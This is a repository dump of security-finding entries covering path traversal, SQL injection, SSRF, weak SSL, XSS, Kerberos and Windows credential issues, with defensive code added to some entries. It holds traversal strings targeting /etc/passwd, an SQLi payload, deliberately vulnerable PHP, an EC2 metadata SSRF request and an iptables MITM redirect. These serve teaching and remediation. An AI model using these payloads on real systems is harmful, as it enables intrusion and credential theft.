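    otherwise None. Backslashes count as separators so Windows-style
    traversal gets the same answer as the forward-slash form."""
    name = decode_fully(user_value).replace("\\", "/")
    if name.startswith("/") or "\x00" in name:
        return None  # absolute paths and NUL truncation tricks: refuse
    parts = [p for p in name.split("/") if p]
    if not parts or not all(SAFE_COMPONENT.match(p) for p in parts):
        return None  # whitelist filter; '..' already fails here
    root_real = root.resolve()
    candidate = root_real.joinpath(*parts).resolve()  # follows symlinks
    try:
        candidate.relative_to(root_real)  # defence in depth: still inside?
    except ValueError:
        return None
    return candidate


# Constructed requests: two legitimate names followed by the traversal
# forms the Detection section lists (plain, encoded, double-encoded,
# absolute, and Windows-style).
REQUESTS = [
    "bob.html",
    "reports/q4.html",
    "../../../../../etc/passwd",
    "..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "%252e%252e/%252e%252e/etc/passwd",
    "/etc/passwd",
    "..\\..\\..\\..\\..\\Windows\\system.ini",
]


def demo() -> Dict[str, bool]:
    """Serve each request from a throwaway document root; True = allowed."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "reports").mkdir(parents=True)
        (root / "bob.html").write_text("<p>bob</p>")
        (root / "reports" / "q4.html").write_text("<p>q4</p>")
        return {req: resolve_within(root, req) is not None for req in REQUESTS}


if __name__ == "__main__":
    for request, allowed in demo().items():
        print("ALLOW " if allowed else "REFUSE", request)
```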
Additionally, whenever 77 | client-supplied input (including cookies and headers) is used as part of a file access request, input sanitization 78 | should be employed using a whitelist filter. 79 | 80 | ## References 81 | 82 | - https://www.owasp.org/index.php/Path_Traversal 83 | - https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001) 84 | - https://cwe.mitre.org/data/definitions/22.html 85 | - https://cwe.mitre.org/data/definitions/23.html 86 | - https://cwe.mitre.org/data/definitions/36.html 87 | 88 | ## Exploitation 89 | 90 | See examples above. 91 | ``` 92 | ``` 93 | -------------------------------------------------------------------------------- /Web/Insecure_Direct_Object_Reference.md: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Insecure Direct Object Reference 3 | Description: Directly access application objects (files, database records, messages, etc.) owned by other users 4 | */ 5 | 6 | - LAST UPDATED DATE: 12/14/2015 7 | - LAST UPDATED BY: Mike S. (hardwaterhacker) 8 | 9 | ## Summary 10 | 11 | Insecure Direct Object Reference results from using user-supplied input to directly reference objects. Insecure 12 | Direct Object References allow attackers directly reference objects by manipulating the parameter value controlling 13 | the object reference, allowing access to objects owned by other application users. 14 | 15 | ## Capabilities and Risk 16 | 17 | Capabilities: 18 | - Direct access to database records, messages, files, etc. 19 | 20 | ## Detection 21 | 22 | To detect Insecure Direct Object Reference, the application must first be mapped to identify parameters which may 23 | control object references, such as ?invoice=12345 or ?msgId=654321. After identifying potential testing points, attempt 24 | to enumerate other objects by manipulating the value associated with the identified parameter. 
Insecure Direct Object Reference exists when the application returns objects belonging to other application users.

Typically, Insecure Direct Object Reference exists within the authentication boundary of the application. However, in poorly designed authentication and authorization schemes, it may be possible to access objects for which authentication is normally required. For example, if a company's support page offers only certain knowledgebase articles to unauthenticated users and requires authentication for all others, it may be possible to access articles which normally require authentication. In this example, if kbarticle.php?article=12345 is viewable by unauthenticated users but article=55555 is intended only for authenticated users, then Insecure Direct Object Reference exists if article=55555 is accessible by an unauthenticated user.

## Remediation

To prevent Insecure Direct Object References, the web application must assign ownership of each referenceable object to a given user, set of users, or group. Whenever objects are referenced, the authorization record for the referenced object must be compared against the requesting user. Users lacking appropriate authorization should be denied access to the object.

## References

- https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
- https://cwe.mitre.org/data/definitions/639.html
- https://cwe.mitre.org/data/definitions/22.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8487
- http://blog.attify.com/2015/05/26/offensive-security-oscp-student-control-panel-owned/

## Exploitation

1. Identify parameters which reference objects
2. Enumerate objects using BurpSuite Intruder or similar methods
3. Determine if objects are owned by another user or should be referenceable by the requester

-------------------------------------------------------------------------------- /Web/Redirection_Based_Privilege_Escalation.md: --------------------------------------------------------------------------------

/*
Title: Redirection Based Privilege Escalation
Description: Leverage of XSS on one page to escalate control over application flow.
*/

- LAST UPDATED DATE: 2015/12/1
- LAST UPDATED BY: @zaeyx

## Summary

Redirection Based Privilege Escalation describes a situation in which a web application is split into at least two parts: one highly secure section (such as a payment system) and one less secured section (an index page, perhaps). When an attacker gains access to the less secure portion of the site, he may leverage this capability to gain access to the application flow and in effect escalate his privileges to exploit the more secure section.

## Capabilities and Risk

An attacker may utilize this technique to turn access to a less secured section of a site into full application flow control.

More work is spent securing the highly sensitive section of the site, but a vulnerability in a less sensitive section of the site is potentially just as dangerous under this model.

## Detection

Detection relies on the application defense team being able to detect the underlying XSS in the less sensitive portion of the application.

Additional detection methods include writing hidden JavaScript routines into the code of the site which send an alert home if they are hosted somewhere other than the original site.

## Remediation

Do not treat the security of one portion of the site as your only priority. Control over application flow can be achieved with an injection into any section, for the subset of users which visit that section.

## Exploitation

An attacker may in effect escalate their privileges to gain access to application flow by first finding an injectable field in any one portion of the site. The attacker then injects into that field a script that performs a redirection to a site that they have control over. The attacker clones the insecure application and redeploys a copy on their malicious site.

When a user visits the page containing the injection they are redirected to the attacker's malicious copy of the vulnerable application. This happens transparently, and unless the user is exceptionally observant they are unlikely to notice the redirection. They will then continue to use the application as before, potentially accessing the highly secure sections (such as the payment system) on the attacker's malicious site.

-------------------------------------------------------------------------------- /Web/SQL_Injection.md: --------------------------------------------------------------------------------

/*
Title: SQL Injection
Description: Injection of SQL commands directly into database
*/

- LAST UPDATED DATE: 2015/12/1
- LAST UPDATED BY: @zaeyx

## Summary

SQL Injection occurs when an unsanitized field takes content from an untrusted source and passes it directly into an SQL query.

## Capabilities and Risk

SQL Injection allows an attacker to execute arbitrary SQL in the context of the web application, potentially gaining the ability to read, write, and modify database contents.

## Detection

Detection can be accomplished by whitelisting known database lookups performed by the web application, and alerting if any commands other than the whitelisted ones are executed against the database in the context of the web application.

This can be accomplished by coding a method into whatever application is used to access the DB that performs these checks/alerts.

MySQL query history can also be [monitored directly.](https://stackoverflow.com/questions/21523811/mysql-commands-history)

Detection of SQLi can also be performed by network or host based IDS.

SQLi can also be detected by monitoring for unexpected changes to the database and its contents manually, by monitoring the web application's logs (such as Apache's access.log), or by monitoring network activity for signs of sensitive data being accessed by a remote party.

## Remediation

Correctly sanitize input into the database from any and all untrusted sources.

This resource provides instructions for proper sanitization in a number of languages: http://bobby-tables.com/
Another resource can be found [here](https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet).

The main method by which one avoids SQLi is through the use of parameterized queries. A parameterized query is a query for which specific inputs are mapped to specific parameters. The exact way to implement this is different in every language and for every library (SQL backend/server type). However, here is a [wonderful resource, a multi-language cheat sheet from OWASP.](https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet)

The end goal is to remove/escape special characters from the user supplied input, or to properly encapsulate the user supplied input in quotes that it cannot escape. These methods can accomplish that for you.

## References

- https://www.owasp.org/index.php/SQL_Injection

## Exploitation

An attacker can exploit this vulnerability by simply injecting arbitrary SQL into an unsanitized input field. The attacker is usually required to properly guess the format of the query into which his input is injected. He can then reverse engineer the format, causing his data to in effect "break out" of the query and create its own.

For example, if a query performs a lookup of username by first name in a users table, it might look something like this: SELECT username FROM users WHERE firstname='user_supplied_firstname'. In this scenario, the attacker would be able to "break out" of the quoted parameter by setting his input like so: user_supplied_firstname = ' or 1=1;--

The final query would look like this: SELECT username FROM users WHERE firstname='' or 1=1;--

This would tell the SQL database to return all the usernames where the firstname is equal to '', or where 1=1. 1 is always equal to 1, therefore it always returns true. This will therefore cause the query to return all of the usernames in the database.

It's a very basic example, but it demonstrates exactly what SQLi is. When special characters are allowed into a query unescaped, they can modify the query itself.

An example is demonstrated below.

```php
<?php
// Deliberately vulnerable example from the entry. The lines opening the database and
// reading the search value were lost in extraction and are reconstructed here; the
// database file name and the "search" parameter name are assumptions.
$db = new SQLite3('users.db');
if (isset($_GET['search'])) {
    $search = $_GET['search'];
    // User input is interpolated straight into the SQL text: this is the bug.
    $results = $db->query("SELECT username FROM users WHERE firstname='$search'");
    while ($row = $results->fetchArray()) {
        echo $row[0];
        echo "<br>";
    }
}
?>
```

The above PHP code is vulnerable to SQLi. It doesn't attempt to escape or remove special characters from the user supplied input before passing it into the query.

It also does not use parameterized queries to wrap the user supplied input inside of quotes, forcing it to stay inside a specific parameter.

**A regular query would look like this.**
![SQLi](../Assets/Web/SQLi_0.png)

**Returning the expected result.**
![SQLi](../Assets/Web/SQLi_1.png)

**However, an attacker can modify the command.**
![SQLi](../Assets/Web/SQLi_2.png)

**And get every single username in the database dumped.**
![SQLi](../Assets/Web/SQLi_3.png)

As you can see, it doesn't take much for an attacker to exploit SQLi when presented with a vulnerable application.

-------------------------------------------------------------------------------- /Web/Server-Side Request Forgery.md: --------------------------------------------------------------------------------

/*
Title: Server-Side Request Forgery (SSRF)
Description: Server-Side Request Forgery, SSRF, CWE-918, CWE-441, A1-Injection
*/

- LAST UPDATED DATE: 12/7/2015
- LAST UPDATED BY: @sethsec

## Summary

The application takes a URL from the user and retrieves the contents of the URL on behalf of the user. However, the application does not sufficiently validate the requested destination. (Paraphrased from CWE-918)

## Capabilities and Risk

- By exploiting SSRF, an attacker can make requests from the application server.
- An attacker can interact with otherwise restricted IP addresses and services, either on the server itself (localhost), or on other IPs. This can give an external attacker visibility into an internal environment. This includes using the vulnerable server to port scan other hosts (Cross Site Port Attacks (XSPA)).
- If the vulnerable server can communicate with backend APIs or services that do not require authentication, the external attacker can fully interact with those services.
- If the vulnerable application is hosted in a cloud environment, such as Amazon EC2 or OpenStack, this may allow the attacker to gain access to metadata services, which can be used to gain access to sensitive information, sometimes including credentials or private keys.

## Detection

1) Browse the target application using an intercepting proxy (Burp, Fiddler, ZAP, etc). Determine if the following conditions apply:
   - The target application is accepting a URL from you. Ex: www.thirdpartysite.com
   - The target application is displaying part or all of the result back to you.

2) If both conditions apply, look at your proxy logs. If you do not see the request to the resource (www.thirdpartysite.com) in your proxy logs, but you see the content on the page, this indicates that the content returned to you has been requested by the server itself on your behalf. This behavior indicates the application is vulnerable to SSRF.

An intentionally vulnerable demo application requesting a page on behalf of the user:
![](imgs/ssrf1.png)

Requesting a webpage that shows the User-Agent and IP address of the requester:
![](imgs/ssrf2.png)

## Remediation

Rather than proxying requests on behalf of users, the application should have the user's browser retrieve the desired information. If it is necessary to proxy the request, a whitelist should be used on the server side and the User-Agent information should be stripped or modified.
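An added example (not from this entry) of the server-side whitelist and User-Agent replacement just described, in Python. It goes one step further than the text and also checks the address a whitelisted name resolves to, so that loopback, private and link-local destinations such as the 169.254.169.254 metadata service are refused. The hostnames in the whitelist and the resolver used in the demo are constructed.

```python
"""Added example (not from the CFDB entry): a server-side whitelist for a URL-fetching
feature, plus a defence-in-depth check on the resolved address. The whitelist entries,
the fixed User-Agent and the resolver used in the demo are constructed."""
import ipaddress
import socket
from typing import Callable, Optional
from urllib.parse import urlsplit

# Constructed whitelist: the only remote sites this feature is allowed to fetch from.
ALLOWED_HOSTS = {"www.thirdpartysite.com", "cdn.thirdpartysite.com"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}          # None means the scheme's default port
# Sent in place of the client's User-Agent, so the fetch is not attributed to the user.
FIXED_USER_AGENT = "example-fetcher/1.0"


def is_public_address(ip_text: str) -> bool:
    """False for loopback, RFC 1918, link-local (169.254.0.0/16 covers the cloud
    metadata service), multicast, reserved and unspecified addresses."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url: str,
                       resolve: Callable[[str], str] = socket.gethostbyname) -> Optional[str]:
    """Return None when the URL may be fetched, otherwise the reason for refusing it.

    The whitelist is the primary control; the address check is defence in depth for
    a whitelisted name that resolves internally. `resolve` is injectable so the logic
    runs offline. In production, connect to the address that passed the check rather
    than re-resolving the name, or a fast-changing DNS record can bypass the check.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return "scheme not allowed"          # also catches a bare "169.254.169.254/..."
    host = parts.hostname                    # lower-cased; IPv6 brackets stripped
    if not host:
        return "no host"
    if parts.username is not None or parts.password is not None:
        return "credentials in URL not allowed"
    if host not in ALLOWED_HOSTS:            # bare IPs and localhost never match
        return "host not whitelisted"
    try:
        port = parts.port
    except ValueError:
        return "invalid port"
    if port not in ALLOWED_PORTS:
        return "port not allowed"
    try:
        address = resolve(host)
    except (OSError, KeyError):
        return "unresolvable host"
    if not is_public_address(address):
        return "resolves to an internal address"
    return None


def outbound_headers(client_headers: dict) -> dict:
    """Headers for the server-side request: the client's User-Agent is replaced and
    nothing else from the client (cookies, authorisation) is forwarded except Accept."""
    headers = {"User-Agent": FIXED_USER_AGENT}
    if "Accept" in client_headers:
        headers["Accept"] = client_headers["Accept"]
    return headers


if __name__ == "__main__":
    # Constructed resolver so the demo runs offline: one public, one internal answer.
    fake_dns = {"www.thirdpartysite.com": "1.2.3.4", "cdn.thirdpartysite.com": "10.0.0.5"}
    for url in ("https://www.thirdpartysite.com/page",
                "http://169.254.169.254/latest/meta-data/",
                "169.254.169.254/latest/dynamic/instance-identity/document",
                "http://cdn.thirdpartysite.com/asset.js"):
        print(f"{url:60} -> {validate_fetch_url(url, lambda h: fake_dns[h])}")
```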

## References

- [OWASP Top 10 2013-A1-Injection](https://www.owasp.org/index.php/Top_10_2013-A1-Injection)
- [CWE-918: Server-Side Request Forgery (SSRF)](http://cwe.mitre.org/data/definitions/918.html)
- [CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')](http://cwe.mitre.org/data/definitions/441.html)
- [EC2 Instance Metadata Service Documentation](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
- [OpenStack Metadata Service Documentation](http://docs.openstack.org/admin-guide-cloud/content/section_metadata-service.html)
- [Compromising an unreachable Solr server with CVE-2013-6397](http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html)
- [Bringing a Machete to the Amazon](https://www.youtube.com/watch?v=JTOWxi17k-w)
- [Prezi Got pwned - A tale of responsible disclosure](http://engineering.prezi.com/blog/2014/03/24/prezi-got-pwned-a-tale-of-responsible-disclosure/)

## Exploitation

Once you have determined that the application is vulnerable to SSRF, the vulnerability can be exploited in many different ways.

- Manually test SSRF using a browser (GET requests), or something like Burp Repeater (POST requests).
- The level of risk you can demonstrate depends on how much you know about the environment.
  - Is the vulnerable application hosted on a service that uses a metadata service (ex: http://169.254.169.254)?
  - If so, pull up the reference documents above and make some requests to valid metadata service endpoints for your respective service.
    - EC2: http://www.example.com/?url=169.254.169.254/latest/dynamic/instance-identity/document
- To discover services, exploit SSRF to perform an XSPA. One simple way to do this is to use Burp Intruder.
  - Send the initial request to Burp Intruder
  - For the URL, use http://host:port format, and make the port the position
  - For the payload, enter the port numbers you want to test (only TCP works)
  - Start the attack.
  - Pay attention to the response times for each requested port. You should be able to infer which ports are open and which ports are closed based on the response times. Quicker times are open ports, longer times are closed ports (they timed out before the client gave up).
- Can you target other services via SSRF that are not directly accessible to you?
- You could even run a tool like dirbuster or the http-enum NSE via SSRF.

Exploiting SSRF to query the Amazon EC2 Metadata service:
![](imgs/ssrf3.png)

Exploiting SSRF to query Amazon EC2 instance user data:
![](imgs/ssrf4.png)

Exploiting SSRF with Burp Intruder and a word list to query a second internal host that is not directly accessible to the attacker. Note how request 3 is a different size than all of the other requests. That is because for all of the other requests, a "page not found" message was sent:

![](imgs/ssrf5.png)

-------------------------------------------------------------------------------- /Web/WeakSSL.md: --------------------------------------------------------------------------------

/*
Title: Weak SSL Configurations
Description: Availability of weak encryption (e.g. DES, RC4, NULL) and hash (e.g. MD4, MD2) algorithms can make SSL/TLS communications more susceptible to decryption and manipulation. In addition, vulnerabilities in old versions of SSL can lead to information disclosure.
*/

- LAST UPDATED DATE: 12/14/2015
- LAST UPDATED BY: Joey M. (l0stkn0wledge)

## Summary

Many web servers still support outdated methods of securing connections with SSL/TLS.
These methods can make the communications between the server and clients more susceptible to both traditional man-in-the-middle attacks and to more sophisticated attacks where the SSL handshake is intercepted and modified to create weaker connections between the client and the server.

## Capabilities and Risk

This can lead to the exposure of encrypted communications, which are often used to transmit sensitive data, including (but not limited to):

- Usernames/Passwords
- Personally Identifiable Information
- Personal Health Information
- Financial Data

## Detection

Readily available tools like 'sslscan' can be used to determine the versions of SSL/TLS and cipher suites supported by a server. Servers can also be tested using 'openssl s_client', which has several configuration options for enabling different versions of SSL/TLS and cipher suites. This allows for testing a server's connection and determining the supported cipher suites.

## Remediation

The best remedy for this finding is to ensure that web servers relying upon SSL/TLS are using up-to-date cipher suites that offer appropriate levels of protection. Modern cipher suites making use of algorithms like AES and SHA-256 are examples of the algorithms to consider for use. Servers should be configured to a minimum SSL/TLS version of TLS v1.0.

## References

- TLS Wikipedia (https://en.wikipedia.org/wiki/Transport_Layer_Security)
- Mozilla Wiki on Server Hardening (https://wiki.mozilla.org/Security/Server_Side_TLS)
- OWASP TLS Cheat Sheet (https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet)
- CVE-2014-3566 "POODLE" (https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566)

## Exploitation

1. An attacker can use methods like ARP spoofing or rogue wireless access points to intercept network communications.
2. Use iptables to redirect to your proxy listening port:

   ```
   iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>
   ```

3. Use a proxy tool (e.g. mitmproxy) to intercept the connection and alter the SSL handshake so the client only requests weaker versions of SSL and/or weaker ciphers (configuration will vary depending on the tool(s) used).

-------------------------------------------------------------------------------- /Web/XSS_Reflective.md: --------------------------------------------------------------------------------

/*
Title: XSS - Reflective
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

Cross-site scripting (XSS) is a vulnerability that enables attackers to inject client-side code into web applications.

## Capabilities and Risk

- Worst case RCE (see reference for Hipchat below)

## Detection

How does one detect the exploitation of this vulnerability, or detect its presence.

## Remediation

What are some of the ways to fix this vulnerability?

## References

- XSS to RCE in Hipchat: http://maustin.net/2015/11/12/hipchat_rce.html
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

A write up on how this vulnerability can be exploited with demo code or screen shots

-------------------------------------------------------------------------------- /Web/XSS_Stored.md: --------------------------------------------------------------------------------

/*
Title: XSS - Stored
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

Cross Site Scripting is

## Capabilities and Risk

This is to replace any "level" or "score" because of how much context is needed for a vulnerability to have one, which is beyond the scope of this database.

- List of possible uses for this vulnerability to give real-world uses
- Read files as www-data (or whatever user the web server is running as)
- DDoS service
- Code execution (for this one to fly there needs to be a reference proving it)

## Detection

How does one detect the exploitation of this vulnerability, or detect its presence.

## Remediation

What are some of the ways to fix this vulnerability?

## References

- Link to blog post
- Link to CVE
- Link to Metasploit module
- Link to Nessus/NeXpose/Qualys write up

## Exploitation

A write up on how this vulnerability can be exploited with demo code or screen shots

-------------------------------------------------------------------------------- /Web/XSTE.md: --------------------------------------------------------------------------------

/*
Title: Cross Site Trust Exploitation
Description: Injection of static content to trick users.
*/

- LAST UPDATED DATE: 2015/12/1
- LAST UPDATED BY: @zaeyx

## Summary

Cross site trust exploitation occurs when an attacker is able to inject data into a web page for the purpose of making the site appear to say something it otherwise would not. This results in the user's trust in the site being exploited. No actual code execution is required.

## Capabilities and Risk

XSTE may allow an attacker to trick users into performing actions that they otherwise would not. If the user trusts that the content of the site cannot be set by anyone other than the site itself, the user is highly likely to trust any content appearing on the site.

The attacker might use, for example, an error field in a form which allows injection of arbitrary (non-code) content to make the error field appear to read that the user must contact the "site admin" @ "malicious@email.com".

## Detection

Detection may be accomplished by monitoring site content and potential injection points. Your best hope is not detection, but rather remediation.

## Remediation

You must not allow injection into any portion of your application where injected content would appear to be coming from the site itself. The user must not be able to in any way edit error fields, for example. (This commonly occurs when a web developer creates one error page which takes the error message as a parameter.)

## References

- http://www.lanmaster53.com/2014/05/cross-site-trust-exploitation/

## Exploitation

The exploitation of this vulnerability is specific to the application in question. It commonly requires nothing more than the attacker writing content into a sanitized field which does not properly format its output to clarify the origin of the content.

Please see the attached blog post for more information.

-------------------------------------------------------------------------------- /Web/imgs/ssrf1.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf1.png

-------------------------------------------------------------------------------- /Web/imgs/ssrf2.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf2.png

-------------------------------------------------------------------------------- /Web/imgs/ssrf3.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf3.png

-------------------------------------------------------------------------------- /Web/imgs/ssrf4.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf4.png

-------------------------------------------------------------------------------- /Web/imgs/ssrf5.png: --------------------------------------------------------------------------------

https://raw.githubusercontent.com/mubix/cfdb/bc0c477a7653224986bcdb160137f91ca927aa09/Web/imgs/ssrf5.png

-------------------------------------------------------------------------------- /Windows/Old_KRBTGT_Password.md: --------------------------------------------------------------------------------

/*
Title: Old KRBTGT Password
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

Commonly referred to as the "Golden Ticket", this vulnerability stems from the fact that the KRBTGT user account that Microsoft uses to "sign" tickets isn't
forced to change and is often discounted due to the fact that it expires soon after the domain is created. If an attacker is able to gain access to the password hash of this account (usually by dumping the domain hashes), they will be able to create a Kerberos ticket to log in to any Windows domain service or share as any user they wish, even fake ones, with any group membership they wish.

## Capabilities and Risk

- Anyone with access to the KRBTGT user account's password hash can effectively authenticate as any user in the domain until the account's password has been changed twice.

## Detection

- TODO add detection mechanisms, there are a few

## Remediation

Set up a script to change the password of the KRBTGT account once a day. This limits the possible abuse window to 48 hours (because of the requirement to change the password twice to be effective). With a 48 hour window, it is less likely that an abuse of the Golden Ticket will be beneficial to an attacker or insider who has gotten to the point where they can dump the KRBTGT account's password hash.

## References

- Kerberos & KRBTGT: Active Directory's Domain Kerberos Service Account: https://adsecurity.org/?p=483

## Exploitation

A write up on how this vulnerability can be exploited with demo code or screen shots

-------------------------------------------------------------------------------- /Windows/Powershell.md: --------------------------------------------------------------------------------

/*
Title: PowerShell
Description: PowerShell is a powerful scripting environment that is built in to all modern Windows systems. When not locked down and properly configured this can give an attacker a great deal of access and the ability to perform functions which otherwise might not be possible without having the ability to install other tools.
*/

- LAST UPDATED DATE: 12/16/2015
- LAST UPDATED BY: Joey M. (@l0stkn0wledge)

## Summary

PowerShell scripting provides a lot of power to IT administrators, but it can also be a powerful tool for an attacker who gains access to a system running PowerShell. The scripting can allow an attacker to perform many functions that would normally require them to install other applications/tools.

## Capabilities and Risk

PowerShell can prove to be useful to attackers for a variety of reasons. There are examples where systems which had access to cmd.exe blocked did not have the same access to powershell.exe blocked, allowing essentially the same level of access as with cmd.exe.

Additionally, the vast scripting capabilities mean that many tools and exploits can potentially be run from a system on which a standard user account may not have privilege to install tools. These tools could be used to perform functions to elevate privileges on the local system, perform network reconnaissance, perform attacks against other remote systems, etc.

## Detection

Execution of powershell.exe on a Windows system is a sign of its availability. To check the execution policy, you can run:

```
Get-ExecutionPolicy
```

## Remediation

The best policy is to disable script execution within PowerShell. Set-ExecutionPolicy allows a Restricted option that will prevent the execution of scripts. While some security guides may recommend setting a policy that only allows signed scripts, this is a trivial barrier for an attacker to bypass. An attacker can bypass this by loading their own user-level certificate (and if necessary CA) and signing scripts that way. These scripts would then still validate as signed.

## References

- Wikipedia link on PowerShell (https://en.wikipedia.org/wiki/Windows_PowerShell)
- Microsoft Technet on Scripting in PowerShell (https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx)
- PowerSploit post exploitation with PowerShell (https://github.com/PowerShellMafia/PowerSploit)

## Exploitation

A write up on how this finding can be exploited with demo code or screen shots

-------------------------------------------------------------------------------- /Windows/Shared_Admin.md: --------------------------------------------------------------------------------

/*
Title: Shared Local Windows Admin Password
Description: Search engine meta data about the finding
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

Pass the Hash is

## Capabilities and Risk

- Lateral code execution and access to all systems with the same local admin password

## Detection

?? Other than dumping hashes and trying it out yourself, I'm lost on this one

## Remediation

- Disable the local Administrator (RID 500) account. Or simply do not enable the account, as it has been disabled by default since Windows Vista
- Enable the LocalAccountTokenFilterPolicy registry key as detailed in the references
- Use Microsoft's LAPS or an alternative local account randomization tool to randomize the local account passwords.

## References

- Pass the Hash: https://en.wikipedia.org/wiki/Pass_the_hash
- Microsoft LAPS: https://www.microsoft.com/en-us/download/details.aspx?id=46899

## Exploitation

### Dumping hashes from exploited machine then using the hash to access other machines on the network

-------------------------------------------------------------------------------- /Windows/WDigest.md: --------------------------------------------------------------------------------

/*
Title: WDigest Enabled
Description: WDigest Clear-Text Password Storage Enabled
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

WDigest is an authentication function that is built into Windows. It is used to allow automatic authentication against web applications that require Digest authentication (MD5). In order to provide the MD5 hash automatically, Windows stores the clear text version of the user's password. Tools like Mimikatz and WCE provide a way to dump these passwords out of memory with the use of administrative access to a system. Mimikatz even has the ability to do this offline with a memory dump of a system's LSASS process.

## Capabilities and Risk

- Lateral code execution and access to all systems that require only password authentication. Due to the fact that Pass-the-Hash is non-trivial with RDP and usually requires specific settings to be set, a clear text credential is much more damaging to an organization.

## Detection

- Host level by detecting Mimikatz or WCE usage
- Network level by mass usage of credentials.
Attackers need to find where the dumped credentials can be used, and the usual way to do this is to test them and see where access is granted


## Remediation

- Disable WDigest storage by applying the patch KB2871997 to all applicable systems

## References

- Patch for WDigest storage: http://blogs.technet.com/b/kfalde/archive/2014/11/01/kb2871997-and-wdigest-part-1.aspx

## Exploitation

### Using Mimikatz to dump clear-text credentials

```
```

--------------------------------------------------------------------------------
/Windows/WPAD.md:
--------------------------------------------------------------------------------
/*
Title: WPAD Enabled
Description: WPAD proxy setting found enabled on a host
*/

- LAST UPDATED DATE: 2015/11/25
- LAST UPDATED BY: @mubix

## Summary

WPAD (Web Proxy Auto-Discovery Protocol) affects any system that has "Auto Discovery Proxy Settings" turned on, and it is on by default in Windows. This

## Capabilities and Risk

- Steal credentials while on the same network as the affected user
- SMB or HTTP relay of credentials to NTLM-based services
- Code execution when used in conjunction with PSEXEC

## Detection

Wireshark looking for WPAD requests on the wire.

## Remediation

Windows has per-user and per-system proxy settings, making this a very difficult setting to fix enterprise-wide.

Using the reference on [craig-tolley.co.uk](http://www.craig-tolley.co.uk/2011/08/30/disable-automatically-detect-settings-in-internet-explorer/) you can set a VB script to run as a Logon Script that will disable this setting.

## References

1. https://www.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
2. http://www.netresec.com/?page=Blog&month=2012-07&post=WPAD-Man-in-the-Middle
3.
http://www.craig-tolley.co.uk/2011/08/30/disable-automatically-detect-settings-in-internet-explorer/

## Exploitation

### Scenario 1: Credential Stealing

```
Code and screen shots of this happening
```

### Scenario 2: SMB Relay to PSEXEC for code execution

```
Code and screen shots of this happening
```

--------------------------------------------------------------------------------
/Windows/Weak_SPN_Password.md:
--------------------------------------------------------------------------------
/*
Title: Weak SPN Password
Description: Crackable password attached to SPN
*/

- LAST UPDATED DATE: 2016/05/25
- LAST UPDATED BY: @mubix

## Summary

Service Principal Names (SPNs) are Microsoft's way of designating and identifying where services are running in a domain. These SPNs are attached to accounts within Active Directory. Any domain user has the ability to look up these attributes and request access to the service they provide. The Active Directory Domain Controller will issue the user requesting access to the service a Kerberos ticket. This ticket includes the encrypted and hashed password for the user the service is running under. Microsoft does this to allow access in the process of that service.
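The summary above describes what any domain user can enumerate. As an added example (not code from cfdb or from Impacket), the PowerShell below takes the defender's view of the same data: it inventories every user account carrying an SPN and annotates each with the signals the Remediation section of this entry turns on, namely privileged group membership, password age, and the fact that it is a plain user account rather than a Managed Service Account (MSAs and computer accounts have machine-strength, auto-rotated keys and are filtered out). It requires the RSAT ActiveDirectory module; the privileged-group list and the 365-day age threshold are assumptions chosen for the example.

```powershell
# Added example (not part of cfdb): list user accounts with SPNs and flag the
# ones the remediation guidance cares about. Assumes the RSAT ActiveDirectory
# module; group names and the age threshold are example defaults.

function Get-KerberoastableAccountReport {
    [CmdletBinding()]
    param(
        [string[]]$PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators'),
        [int]$MaxPasswordAgeDays = 365
    )
    Import-Module ActiveDirectory -ErrorAction Stop

    # Only user objects: computer accounts and (g)MSAs are not the crackable
    # population. krbtgt is excluded because it is covered by its own entry
    # (Old_KRBTGT_Password.md).
    $filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))'
    $users = Get-ADUser -LDAPFilter $filter -Properties servicePrincipalName, PasswordLastSet, MemberOf, Enabled

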